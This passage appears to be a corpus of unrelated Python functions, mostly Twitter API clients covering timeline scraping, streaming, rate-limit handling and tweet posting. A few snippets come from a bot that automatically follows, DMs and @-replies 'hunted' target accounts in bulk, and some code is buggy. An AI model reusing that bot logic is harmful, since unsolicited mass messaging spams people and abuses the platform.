data[\"timestamp\"]\n except:\n t.timestamp = datetime.datetime.utcnow()\n tweet_cache.append(t.to_dict())\n \n #\n # get the embed html from twitter oembed API\n #\n r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #print(r.json())\n \n #print(self.__class__.callbacks)\n await self.fire_callbacks(r.json())\n #self.success(message=\"Added tweet id: {} \".format(str(id)), data=t.to_json(), format=\"json\", pure=True)", "def on_limit(self, track):\n print ('Got Rate limit Message', str(track))\n return True # Don't kill the stream", "async def oauth_whitelist(self, ctx, target: Union[Role, utils.User]):\n whitelisted = self.bot.config[\"oauth_whitelist\"]\n\n # target.id is not int??\n if target.id in whitelisted:\n whitelisted.remove(target.id)\n removed = True\n else:\n whitelisted.append(target.id)\n removed = False\n\n await self.bot.config.update()\n\n embed = Embed(color=self.bot.main_color)\n embed.title = \"Success\"\n\n if not hasattr(target, \"mention\"):\n target = self.bot.get_user(target.id) or self.bot.modmail_guild.get_role(\n target.id\n )\n\n embed.description = (\n f\"{'Un-w' if removed else 'W'}hitelisted \" f\"{target.mention} to view logs.\"\n )\n\n await ctx.send(embed=embed)", "async def twitter_fetch(self, ctx, handle, limit: int=1):\n sane_handle = handle.lower().lstrip('@')\n # Get the latest tweets from the user\n try:\n to_display = await self.get_latest_valid(screen_name=sane_handle, limit=limit)\n except tweepy.TweepError as e:\n # The channel is probably protected\n if e.reason == 'Not authorized.':\n raise TwitterError('This channel is protected, its tweets cannot be fetched.') from e\n if e.api_code == 34:\n raise TwitterError('User \"{}\" not found.'.format(handle)) from e\n else:\n log.error(str(e))\n raise TwitterError('Unknown error from the Twitter API, this has been logged.') from e\n\n # Display the kept tweets\n for tweet in to_display:\n embed = await self.prepare_embed(tweet)\n await self.bot.say(embed=embed)", "def get_posts(username):\r\n\r\n # Authenticate to Twitter\r\n auth = tweepy.OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)\r\n auth.set_access_token(twitter_credentials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)\r\n\r\n api = tweepy.API(auth)\r\n\r\n try:\r\n api.verify_credentials()\r\n print(\"Authentication OK\")\r\n except:\r\n print(\"Error during authentication\")\r\n\r\n alltweets=[]\r\n\r\n new_tweets = api.user_timeline(screen_name = username,count=200,tweet_mode='extended')\r\n status = new_tweets[0]\r\n json_str = json.dumps(status._json)\r\n\r\n #convert to string\r\n json_str = json.dumps(status._json)\r\n #deserialise string into python object\r\n parsed = json.loads(json_str)\r\n print(json.dumps(parsed, indent=4, sort_keys=True))\r\n\r\n # save most recent tweets\r\n alltweets.extend(new_tweets)\r\n\r\n # save the id of the oldest tweet less one\r\n oldest = alltweets[-1].id - 1\r\n\r\n # keep grabbing tweets until there are no tweets left to grab\r\n while len(new_tweets) > 0:\r\n print(f\"getting tweets before {oldest}\")\r\n\r\n # all subsiquent requests use the max_id param to prevent duplicates\r\n new_tweets = api.user_timeline(screen_name=username, count=200, max_id=oldest,tweet_mode='extended')\r\n\r\n # save most recent tweets\r\n alltweets.extend(new_tweets)\r\n\r\n # update the id of the oldest tweet less one\r\n oldest = alltweets[-1].id - 1\r\n\r\n print(f\"...{len(alltweets)} tweets downloaded so far\")\r\n\r\n\r\n outtweets=[]\r\n\r\n\r\n for item in alltweets:\r\n\r\n mined = {\r\n 'tweet_id': item.id,\r\n 'name': item.user.name,\r\n 'screen_name': item.user.screen_name,\r\n 'retweet_count': item.retweet_count,\r\n 'lang' : item.lang,\r\n 'text': item.full_text,\r\n 'mined_at': datetime.datetime.now(),\r\n 'created_at': item.created_at,\r\n 'favourite_count': item.favorite_count,\r\n 'hashtags': item.entities['hashtags'],\r\n 'status_count': item.user.statuses_count,\r\n 'location': item.place,\r\n 'source_device': item.source\r\n }\r\n\r\n try:\r\n mined['retweet_text'] = item.retweeted_status.full_text # In case the tweet is a RT, there is a need to\r\n # retrieve the retweet_text field which contains the full comment (up to 280 char) accompanying the retweet\r\n except:\r\n mined['retweet_text'] = ''\r\n\r\n outtweets.extend([mined])\r\n\r\n return outtweets", "def message_no_limit(request):\n \n # this is only available in development - should use our\n # parse.decorators.dev_only decorator instead of this\n if PRODUCTION_SERVER:\n raise Http404 \n\n # insert the token in the session and return a plaintext response\n # confirming the success of the operation\n if request.method == \"GET\":\n request.session[\"message_limit_off\"] = True\n return HttpResponse(\"Limit for sending messages has been turned off.\" +\\\n \"To turn it back on, please log out and log back in.\")\n \n # only accept GET methods \n return HttpResponse(\"Bad Request\")", "def prevent_throttling(self):\n now = time.time()\n if now - self.last_request < 1:\n logger.verbose(\"Last request issued less than 1 second ago\")\n logger.verbose(\"Sleep {0} second to avoid throttling.\",\n SHORT_WAITING_INTERVAL)\n time.sleep(SHORT_WAITING_INTERVAL)\n self.last_request = now\n\n self.req_count += 1\n if self.req_count % 3 == 0:\n logger.verbose(\"Sleep {0} second to avoid throttling.\",\n SHORT_WAITING_INTERVAL)\n time.sleep(SHORT_WAITING_INTERVAL)\n self.req_count = 0", "def Stream():\r\n \r\n config = config_create()\r\n CONSUMER_KEY = config.get('Auth', 'CONSUMER_KEY') \r\n CONSUMER_SECRET = config.get('Auth', 'CONSUMER_SECRET')\r\n ACCESS_KEY = config.get('Auth', 'ACCESS_KEY')\r\n ACCESS_SECRET = config.get('Auth', 'ACCESS_SECRET')\r\n searchterm = config.get('Filter','search')\r\n name = multiprocessing.current_process().name\r\n \"\"\"Function that will manage doing the twitter stream\"\"\"\r\n stream = MyStreamer(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET)\r\n stream.statuses.filter(track= searchterm)", "def tweets(request):\n if request.method == 'GET':\n max_items = request.GET.get('max_items') or _DEFAULT_MAX_ITEMS\n try:\n sentiments = models.Sentiment.objects.filter(is_tweet=True)[:max_items]\n serializer = models.SentimentSerializer(sentiments, many=True)\n return JSONResponse(serializer.data)\n except ObjectDoesNotExist:\n return JSONResponse([])\n return JSONResponse([], status=400)", "def get_all_tweets(user, alltweets):\n\n #TODO check that user is a valid screen name??\n\n #make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(user, count=200)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n #print alltweets[0].text\n\n #save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n #print \"starting loop\"\n #keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n\n #all subsiquent requests starting with oldest\n new_tweets = api.user_timeline(user, count=200, max_id=oldest)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1", "def handler(event,context):\n tweet = setup_and_get_tweet()\n send_tweet(tweet)", "def on_limit(self, track):\n print \"!!! Limitation notice received: %s\" % str(track)\n return", "def twitter(self, twitter):\n\n self._twitter = twitter", "def test429Error300request(self):\n \"\"\" In this case the search() method send more than one rewuest per second, so twitter get 429 error. \"\"\"\n \"\"\" In this case we wait for 2 second before resend the request \"\"\"\n \"\"\" WARNING: TIME EXPENSIVE TEST: 20-25min needed \"\"\"\n wk = os.path.dirname(os.path.abspath(__file__))\n f = os.path.join(wk, \"search_tweets.config\")\n twitter_research = SearchTweets(self.db, f)\n with patch.object(twitter_research, '_SearchTweets__twitter_n_results',\n new_callable=PropertyMock(return_value=10)):\n with patch.object(twitter_research, '_SearchTweets__multi_user',\n new_callable=PropertyMock(return_value=False)):\n with patch.object(twitter_research, '_SearchTweets__twitter_users',\n new_callable=PropertyMock(return_value=[])):\n with patch.object(twitter_research, '_SearchTweets__twitter_keyword',\n new_callable=PropertyMock(return_value=\"Eurovision\")):\n with patch.object(twitter_research, '_SearchTweets__save'):\n logging.getLogger('SEARCH').propagate = False\n with self.assertLogs('SEARCH', level='INFO') as cm:\n for i in (tqdm(range(0, 301), desc=\"NUMBER OF REQUEST\", leave=True)):\n twitter_research.search()\n time.sleep(0.3)\n self.assertTrue('INFO:SEARCH:RATE LIMITS REACHED: WAITING' in cm.output)\n self.assertEqual(twitter_research.total_result, 3010)", "def get(self, request):\n if request.user.is_authenticated:\n if not request.user.consumer_key and not request.user.consumer_secret and not request.user.oauth_token and \\\n not request.user.oauth_token_secret:\n return Response({\"message\": \"Kindly supply the twitter authentication keys in the admin dashboard\"},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n api = load_api(request)\n try:\n my_tweets = api.user_timeline()\n except tweepy.TweepError as e:\n return Response({\"message\": e.args[0][0]['message']}, status=status.HTTP_400_BAD_REQUEST)\n tweet_list = []\n for tweet in my_tweets:\n tweet_list.append(tweet.text)\n return Response({'message': tweet_list}, status=status.HTTP_200_OK)\n else:\n return Response({\"message\": \"Kindly create an account and log in first\"},\n status=status.HTTP_400_BAD_REQUEST)", "def tweet(api):\n logger.info(\"Tweeting content\")\n urls = get_article('the_onion.txt')\n lines = content_list(urls)\n\n for line in lines:\n try:\n api.update_status(line)\n logger.info(\"Tweeting!\")\n time.sleep(SECONDS)\n\n except tweepy.TweepError as err:\n logger.error(err)", "def on_data(self, tweet):\n if (time.time() - self.start_time) < self.limit:\n self.saveFile.write(tweet)\n return True\n else:\n self.saveFile.close()\n return False", "def get_followers(twitter,screen_name,filename,count):\n url = 'https://api.twitter.com/1.1/followers/ids.json?&screen_name=@'+screen_name+'&skip_status=true&include_user_entities=false&count='+str(count) \n consumer = oauth.Consumer(key=consumer_key, secret=consumer_secret)\n access = oauth.Token(key=access_token, secret=access_token_secret)\n client = oauth.Client(consumer, access)\n try:\n response,data = client.request(url)\n dataStr = data.decode('utf-8') \n if('Rate limit exceeded' in dataStr ):\n print('rate limit exceeded error.. sleep for 15 min')\n time.sleep(61 * 15)\n response,data = client.request(url)\n \n jsonid = json.loads(dataStr)\n li = list(jsonid['ids'])\n output = open(filename, 'wb')\n pickle.dump(li, output)\n output.close()\n except:\n pass\n \n return li", "def get_all_tweets(screen_name: object):\r\n temptweets = []\r\n alltweets = []\r\n new_tweets = api.user_timeline(screen_name=screen_name, count=199)\r\n alltweets.extend(new_tweets)\r\n print(alltweets[1].id)\r\n oldest = alltweets[-1].id - 1\r\n while 0 < len(new_tweets) < 200:\r\n new_tweets = tweepy.Cursor(api.user_timeline, screen_name=screen_name, count=199, max_id=oldest).items(1500)\r\n alltweets.extend(new_tweets)\r\n for tweet in alltweets:\r\n if (not tweet.retweeted) and ('RT @' not in tweet.text):\r\n temptweets.append(tweet)\r\n oldest = alltweets[-1].id - 1\r\n print(\"Total tweets downloaded from %s are %s\" % (screen_name, len(temptweets)))\r\n return temptweets", "def send_tweet(tweet_text):\n twitter.update_status(status = tweet_text)", "def reply_to_tweets():\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n mentions = api.mentions_timeline(\n last_seen_id,\n tweet_mode='extended')\n\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text, flush=True)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id, FILE_NAME)\n for i in range(len(keywords)):\n if keywords[i] in mention.full_text.lower():\n print(\"responding back to: \" + '@' +\n mention.user.screen_name, flush=True)\n api.update_status('@' + mention.user.screen_name + ' ' +\n salts[i], mention.id)", "def follow_reciprocated(self, target):\n if random.randint(1, 1000) == 1: # 1 in 20 are public @replies\n self.tweet_user(target)\n else:\n try:\n self.dm_user(target)\n except:\n pass", "def check(self):\n self.__check_request_limit()", "def get_tweets_by_user_route(username):\n response, code = get_tweets_by_user(\n username, request.args.get('limit', 30))\n return jsonify(response), code", "def __init__(self):\n super().__init__()\n\n # Will only reply to every 3rd or so tweet, defined in settings\n self.received_tweet_count = 0\n\n # Twitter api init\n self.auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n self.auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n self.twitter_api = tweepy.API(self.auth)\n\n print('Authenticated, creating stream...')\n\n self._init_stream()", "def tweet_btn_clicked(self,widget, data=None):\n tweet_text = self.get_text(\"txt_tweet\") \n \n #double check the length and go.\n if (len(tweet_text) <= 140): \n self.twitter.UpdateStatus(tweet_text) \n status_label = self.builder.get_object(\"status_lbl\")\n #clear the text box and update the status\n self.builder.get_object(\"txt_tweet\").set_text(\"\")\n my_tweet_bufffer = self.builder.get_object(\"personal_tweet_buffer\")\n iters = my_tweet_bufffer.get_end_iter()\n my_tweet_bufffer.insert(iters, \"%s\\n\\n\" % tweet_text)\n else:\n status_label = self.builder.get_object(\"status_lbl\")\n status_label.set_text(\"Too long: Tweet != Blog -__-\")\n print tweet_text", "def skip_tweet(self, status, from_stream=True):\n log_status = 'author: {}, reply_to_status: {}, reply_to_user: {}, quoting: {}, retweet: {}, text: {}'\n log_status = log_status.format(status.author.screen_name,\n status.in_reply_to_status_id,\n status.in_reply_to_user_id,\n status.is_quote_status,\n hasattr(status, 'retweeted_status'),\n status.text)\n\n # Ignore replies\n if status.in_reply_to_status_id or status.in_reply_to_user_id:\n log.debug('Ignoring tweet (reply): ' + log_status)\n return True\n elif from_stream and status.author.id_str not in self.stream.get_follows():\n log.debug('Ignoring tweet (bad author): ' + log_status)\n return True\n else:\n log.debug('Dispatching tweet to handler: ' + log_status)\n return False", "async def tweet():\n with logger.contextualize(request_id=str(uuid.uuid4())):\n tweets = generate()\n upload(tweets)", "def TwitterListener():\n l = StdOutListener()\n auth = OAuthHandler(config.CONSUMER_KEY, config.CONSUMER_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n stream = Stream(auth, l)\n api = API(auth_handler=auth)\n config.HASHTAGS = [x['name'] for x in api.trends_place(id=44418)[0]['trends']]\n\n print(\"Stream listener is up and running\")\n stream.filter(track=config.HASHTAGS)", "def _apply_rate_limit(self):\n update_time = time()\n user_name = self.bot.user.full_name\n if user_name in self.tokens.keys():\n last_change = self.tokens[user_name][0]\n # Add 1 token for every 30 seconds from the last change\n added_tokens = int((update_time - last_change) / 30)\n self.tokens[user_name][1] += added_tokens\n # Max at 5 self.tokens\n if self.tokens[user_name][1] > 5:\n self.tokens[user_name][1] = 5\n else:\n # Initialize the users token pair (last change, # of self.tokens)\n self.tokens[user_name] = [update_time, 5] # Start with 5 self.tokens\n if self.tokens[user_name][1] <= 0:\n return False\n self.tokens[user_name][1] -= 1\n return True", "def get_tweets(username, amount):\n tweets = []\n twitter = Twython()\n\n finished = False\n page = 1\n while not finished:\n\n if amount <= 200:\n # Make the API call.\n search_results = twitter.getUserTimeline(screen_name=username,\n page=str(page), count=str(amount))\n finished = True\n\n else:\n # Make the API call.\n search_results = twitter.getUserTimeline(screen_name=username,\n page=str(page), count='200')\n amount -= 200\n page += 1\n\n if isinstance(search_results, dict) and search_results['error']:\n raise TwitterAPIException(str(search_results['error']))\n elif not search_results:\n raise TwitterAPIException('User has no tweets.')\n\n for result in search_results:\n tweets.append(result['text']) \n\n return tweets", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def _throttle_check(self, request):\n identifier = self._meta.authentication.get_identifier(request)\n\n # Check to see if they should be throttled.\n if self._meta.throttle.should_be_throttled(identifier):\n # Throttle limit exceeded.\n raise ImmediateHttpResponse(response=http.HttpTooManyRequests())", "def follow_user(self, target):\n try:\n if self.api.me().friends_count > 1990:\n return\n except Exception, e:\n print e\n\n \"Rate limit exceeded. Clients may not make more than 350 requests per hour.\"\n if \"Clients\" in str(e):\n continue\n # import pdb; pdb.set_trace()\n return\n\n try:\n self.api.create_friendship(target.hunted.screen_name)\n self.log.debug(\"Followed: %s\" % target.hunted.screen_name)\n except Exception, e:\n self.log.exception(\"Could not follow %s\" %\n target.hunted.screen_name)\n else:\n # Write record of new follow to db\n target.status = Target.PURGATORY\n target.save()", "def sendTweets(self):\n\n if self.__status_type == 'link':\n\n for index, item in self.list.iterrows():\n\n title = item['title']\n url = item['url']\n message = (url + \" \" + title)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n elif self.__status_type == 'single_msg':\n\n message = (self.__status)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n elif self.__status_type == 'reply':\n\n for index, item in self.list.iterrows():\n\n message = (\".@\" + item['user'] + \" \" + self.__status)[0:140]\n\n try:\n if self.__image == None:\n self.__api.update_status(status=message, in_reply_to_status_id=item['id'])\n else:\n self.__api.update_with_media(filename=self.__image, status=message,\n in_reply_to_status_id=item['id'])\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"reply status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n elif self.__status_type == 'at':\n\n for index, item in self.list.iterrows():\n\n try:\n\n message = (\".@\" + item['user'] + \" \" + self.__status)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"at status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n elif self.__status_type == 'rt':\n\n for index, item in self.list.iterrows():\n try:\n self.__api.retweet(item['id'])\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"at status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n else:\n print(\"Invalid status type. Change status type through configure_tweet method.\")\n\n return", "def tweet_call(self):\n check = True\n # if a since_id and a max_id is given, the new since_id shouldn't be taken\n # into account because it will be lower than a previous record\n # the mnax_id is used when several call are needed\n if self.last_max_id is None and self.since_id is not None:\n self.since_id = None\n while check is True:\n result = self.create_URL()\n # Return a list of tweet, need to get the last tweet\n # To have the latest tweet. The -1 to avoid redundancies\n try:\n result.max_id = int(result.response[-1]['id']) - 1\n self.last_max_id = result.max_id\n self.parameters['max_id'] = result.max_id\n # self.parameters['since_id'] = result.since_id\n if self.since_id is not None:\n result.since_id = self.since_id\n else:\n self.since_id = int(result.response[0]['id'])\n result.since_id = self.since_id\n # Last return is an empty list because the last max_id match the last tweet\n # When try to collect response from a protected account\n # return the str() \"protected\" and break here\n # so just pass an go straight to the yield result\n except (IndexError, TypeError):\n try:\n result.max_id = self.last_max_id\n except AttributeError:\n result.max_id = None\n try:\n result.since_id = self.since_id\n except AttributeError:\n result.since_id = None\n check = False\n yield result", "def filter_yt(info: interceptor.Request):\n\turl = info.request_url\n\tif (url.host() == 'www.youtube.com' and\n\t\t\turl.path() == '/get_video_info' and\n\t\t\t'&adformat=' in url.query()):\n\t\tinfo.block()", "def reply_to_tweet():\n\n print('retrieving and replying to tweets...')\n all_mentions = api.mentions_timeline()\n\n # The content of the reply that the bot will send.\n rap_message = ' yo yo yo yo'\n\n for mention in reversed(all_mentions):\n\n # print(str(mention.id) + '-' + mention.text)\n\n if 'rap for me' in mention.text.lower():\n # checks if the bot received a request to deliver a rap\n print('received a request')\n print('dropping a new single...')\n # Checks if the latest mention came from the same person.\n if mention.id == mention.id[0]:\n # Posts a tweet saying the bot is 'too tired' and won't generate a new rap.\n api.update_status('@' + mention.user.screen_name + ' yo sorry I am too tired right now')\n else:\n # Posts a tweet with the rap to the user.\n api.update_status('@' + mention.user.screen_name + rap_message, mention.id)\n print('single dropped.')", "def set_throttle(self, limit=None, units=None):\n self.delay = 0\n self.max_requests = 1e16\n self.made_requests = 0", "def twitter_auth(k, s):\n\n auth = tweepy.AppAuthHandler(k, s)\n api = tweepy.API(\n auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True\n )\n\n if (not api):\n return None\n else:\n return api", "def disable_rate_limit_forward(self):\n self.headers = {\n 'Content-Type': 'application/json; charset=utf-8',\n 'X-Algolia-API-Key': self.api_key,\n 'X-Algolia-Application-Id': self.application_id,\n 'User-Agent': ('Algolia Search for python %s' % VERSION)\n }", "def tweet(chains):\n\n # Use Python os.environ to get at environmental variables\n # Note: you must run `source secrets.sh` before running this file\n # to make sure these environmental variables are set.\n\n api = twitter.Api(\n consumer_key=os.environ['TWITTER_CONSUMER_KEY'],\n consumer_secret=os.environ['TWITTER_CONSUMER_SECRET'],\n access_token_key=os.environ['TWITTER_ACCESS_TOKEN_KEY'],\n access_token_secret=os.environ['TWITTER_ACCESS_TOKEN_SECRET'])\n\n # print api.VerifyCredentials()\n\n user_choice = None\n while not (user_choice == 'q' or user_choice == 'Q'):\n status = api.PostUpdate(make_text(chains))\n #status = api.PostUpdate(\"Something random\")\n\n print status.text\n user_choice = raw_input(\"Enter to tweet again [q to quit] > \")", "def filter_tweet_core(tweet):\n if not ('user' in tweet and 'screen_name' in tweet['user'] \\\n and 'text' in tweet):\n return False\n if not filter_tweet_text(tweet['text']):\n return False\n if bannedclients.search(tweet['source']):\n return False\n if bannedterms.search(tweet['text']):\n return False\n if bannedterms.search(tweet['user']['screen_name']):\n return False\n if 'entities' in tweet and bannedterms.search(json.dumps(tweet['entities'])):\n return False\n if not filter_tweet_entropy(tweet['text']):\n return False\n if not filter_tweet_cardspam(tweet):\n return False\n return True", "def check_rate_limit(session, provided_iocs):\n rate_limit = session.rate_limit_status()[\"resources\"][\"search\"][\"/search/tweets\"]\n\n if rate_limit[\"remaining\"] == 0:\n reset_time = rate_limit[\"reset\"]\n rate_limit[\"reset\"] = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(reset_time))\n return rate_limit\n\n if len(provided_iocs) > rate_limit[\"remaining\"]:\n rate_limit = {\"Search term limit\": rate_limit[\"remaining\"],\n \"Total Search Terms Provided\": len(provided_iocs)}\n return rate_limit\n return", "def _filter_in_request(self):\n pass", "def twitterCall(methodName,args,credentials=False):\n api = ratedTwitter(credentials=credentials)\n limit = api.__can_we_do_that__(methodName)\n if limit:\n print '*** TWITTER RATE-LIMITED: '+methodName+' ***'\n raise twitterCall.retry(exc=Exception('Twitter rate-limited',methodName), countdown = limit)\n else:\n okay, result = api.__method_call__(methodName,args)\n if okay:\n print '*** TWITTER CALL: '+methodName+' ***' \n return result\n else:\n assert False", "def tweet_user(self, target, msg=None):\n self.log.debug(\"Tweeting %s\" % target.hunted.screen_name)\n tweet = \"@%s: %s\" % (target.hunted.screen_name,\n random.sample(self.tweets, 1)[0])\n tweet = tweet [:140]\n self.api.update_status(tweet)\n target.status = Target.FOLLOWER\n target.save()", "def check_rate_limit(api, url, zzz=180.0):\n pattern = 'https:\\/\\/api.twitter.com\\/.*(\\/([a-z_]*)\\/.*)\\.json'\n endpoint, family = re.match(pattern, url).groups()\n url = \"https://api.twitter.com/1.1/application/rate_limit_status.json\"\n params = {\"resources\": [family]}\n response = api.get(url, params=params)\n response.close()\n try:\n return response.json()[\"resources\"][family][endpoint]\n except KeyError:\n try:\n return response.json()[\"resources\"][family][endpoint + '/:id']\n except KeyError:\n print \"Error checking rate limit status:\"\n print response.json()\n print \"Sleeping {:,}s and trying again...\".format(zzz)\n # DEBUG\n # Weirdly we get an OpenSSL error everytime\n # we go to sleep\n time.sleep(zzz)\n return check_rate_limit(api, url, zzz=zzz*2)", "def send(self, *args, **kwargs):\n thread_id = id(current_thread())\n denyaccess = thread_id in self.blacklist\n if not thread_id in self.whitelist:\n if self.timelimit is not None:\n denyaccess |= (self.get_elapsed_time() > self.timelimit)\n denyaccess |= self.stop_event.is_set()\n if denyaccess:\n raise AccessDenied(thread_id)\n else:\n return self.manager(self, *args, **kwargs)", "async def fortune(self, ctx: Message):\n\t\treq = requests.get(\"http://yerkee.com/api/fortune\").json()[\"fortune\"]\n\t\tline = req.replace('\\n', '').replace('\\t', '')\n\t\tawait self.send(line, whisper=[ctx.author.id])", "def throttle(self):\n\n # Check how long it has been since last request was sent\n time_since_req = time.time() - self.time_last_req\n\n # If last request was too recent, pause\n if time_since_req < self.wait_time:\n self.wait(self.wait_time - time_since_req)", "def Tweet_stream():\r\n \r\n while True:\r\n name = multiprocessing.current_process().name\r\n \r\n \r\n #try:\r\n \r\n print('Begin Tweet Attempt')\r\n \r\n Do_RT()\r\n time.sleep(1)\r\n \r\n \r\n #except:\r\n #add rate limit\r\n #print('Tweet Stream Error')\r\n #continue\r\n #Tweet_stream()\r", "def get_tweets(self, output_path, tweets_ids):\n\n\t\tloading = 0\n\n\t\tapp = TwitterApp.get_twitter_app_instance(self)\n\n\t\ttweets_content = []\n\n\t\tnew_tweets_ids = []\n\n\t\tqty_tweets = len(tweets_ids)\n\n\t\tlast_index = 0\n\n\t\twhile True:\n\t\t\t\n\t\t\ttry:\n\n\t\t\t\tresponse = app.GetStatuses(tweets_ids[last_index:last_index+100], map=True)\n\t\t\t\t\n\t\t\texcept Exception as e:\n\n\t\t\t\t# save the available posts to this time\n\t\t\t\tdataset = pd.DataFrame({'tweet_id':new_tweets_ids, 'post_content':tweets_content})\n\t\t\t\twrite_tweets(output_path, dataset)\n\n\t\t\t\tlogging.info(''.join(['Error on request ', str(loading)]))\n\n\t\t\t\tprint(\"ERROR:\", e)\n\n\t\t\t\t'''\n\t\t\t\tUsually, the rate limit allowed by Twitter API is exceeded (in this case GET statuses/lookup is 900 for user auth and 300 for the app auth for every 15 minutes), one way to deal with it is sleeping the code for approximately 15 minutes to continue after.\n\t\t\t\t'''\n\t\t\t\ttime.sleep(950)\n\n\t\t\t\ttry:\n\n\t\t\t\t\tresponse = app.GetStatuses(tweets_ids[last_index:last_index+100], map=True)\n\t\t\t\t\n\t\t\t\texcept Exception as e:\n\n\t\t\t\t\tprint(e)\n\t\t\t\t\texit(1)\n\n\n\t\t\tfor id_value, text in response.items():\t\t\t\n\n\t\t\t\t# This means that the post is not available now.\n\t\t\t\tif (text == None):\n\t\t\t\t\tcontinue\n\n\t\t\t\telse:\n\n\t\t\t\t\tnew_tweets_ids.append(id_value)\n\t\t\t\t\ttweets_content.append(text.text)\n\n\t\t\t# Each request gets 100 posts\n\t\t\tlast_index = last_index + 100\n\n\t\t\t# There is no more IDs\n\t\t\tif (last_index > qty_tweets):\n\t\t\t\tbreak\t\n\t\t\n\t\t# save all tweets\n\t\tdataset = pd.DataFrame({'tweet_id':new_tweets_ids, 'post_content':tweets_content})\n\t\twrite_tweets(output_path, dataset)", "def users_being_followed_tweets():\n username = request.authorization.username\n tweets = []\n\n user_id = get_user_id(username);\n tuples = query_db('''\n select message.*, user.* from message, user\n where message.author_id = user.user_id and (\n user.user_id = ? or\n user.user_id in (select whom_id from follower\n where who_id = ?))\n order by message.pub_date desc limit ?''',\n [user_id, user_id, PER_PAGE])\n\n for tuple in tuples:\n tweet = {}\n tweet[\"message_id\"] = tuple['message_id']\n tweet[\"author_id\"] = tuple['author_id']\n tweet[\"text\"] = tuple['text']\n tweet[\"pub_date\"] = tuple['pub_date']\n tweet[\"username\"] = tuple['username']\n tweet[\"email\"] = tuple['email']\n tweets.append(tweet)\n\n return jsonify({'tweets': tweets}), 200", "def post_to_twitter(sender, instance, **kwargs):\n\n if instance.pk: #only post the tweet if it's a new record. \n return False \n \n accounts = TwitterAccount.objects.all()\n \n for account in accounts:\n bittle = Bittle.objects.bitlify(instance.get_absolute_url())\n mesg = \"%s: %s\" % (\"New Blog Post\", bittle.shortUrl)\n username = account.username\n password = account.get_password()\n try:\n twitter_api = twitter.Api(username, password)\n twitter_api.PostUpdate(mesg)\n except urllib2.HttpError, ex:\n print str(ex)\n return False", "def on_success(self, data):\n\n # only want to collect English-language tweets\n if data['lang'] == 'en':\n tweet = data['text']\n processed_tweets.append(preprocess_tweet(tweet))\n\n # stop when we've collected enough\n if len(processed_tweets) >= 5:\n self.disconnect()", "def on_data(self, data):\n # Try-Except used by tweepy\n try:\n # If the limit type is time, and the time passed is less than the limit, continue\n if self.limit_type == \"TIME\" and (time.time() - self.start_time < self.limit):\n item = json.loads(data)\n print(item)\n if 'created_at' in item.keys():\n self.temp |= set(item.keys())\n self.database.store_data(item)\n else:\n pass\n # The below is a check to prevent entering another loop by forcing the stream to be cutoff\n if (time.time() - self.start_time) < self.limit:\n return True\n else:\n self.database.finish()\n return False\n # If the limit type is count, and the number of tweets streamed in hasn't reached the limit, continue\n elif self.limit_type == \"COUNT\" and self.limit != 0:\n # See limit type = 'TIME' for confusion about below\n item = json.loads(data)\n if 'created_at' in item.keys():\n good = self.database.store_data(item)\n self.limit += good\n self.limit -= 1\n else:\n pass\n if self.limit > 0:\n return True\n else:\n self.database.finish()\n # Call counter\n return False\n else:\n return False\n except BaseException as e:\n print(e)\n return True", "def get_tweets(twitter, screen_name, num_tweets):\n\n request = robust_request(twitter, 'search/tweets', {'q': screen_name, 'count': num_tweets})\n tweets = [a['text'] for a in request]\n\n return tweets", "def search_machine(ID,machine):\n\tconsumer_key = machine['consumer_key']\n\tconsumer_secret = machine['consumer_secret']\n\taccess_token = machine['access_token']\n\taccess_secret = machine['access_secret']\n\tauth = OAuthHandler(consumer_key, consumer_secret)\n\tauth.set_access_token(access_token, access_secret)\n\tapi = tweepy.API(auth, wait_on_rate_limit_notify=True)\n\n\t\"\"\"Search for tweets via Twitter Search API.\"\"\"\n\tsinceId = None\n\tmax_id = ID\n\ttweetsCounts = 0\n\tfinshed_job = False\n\twith open (outfile,'w+') as f:\n\t\twhile tweetsCounts < maxTweets:\n\t\t\ttry:\n\t\t\t\tif (max_id <= 0):\n\t\t\t\t\tif (not sinceId):\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq = query,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tcount = searchLimits)\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query,\n\t\t\t\t\t\t\tcount = 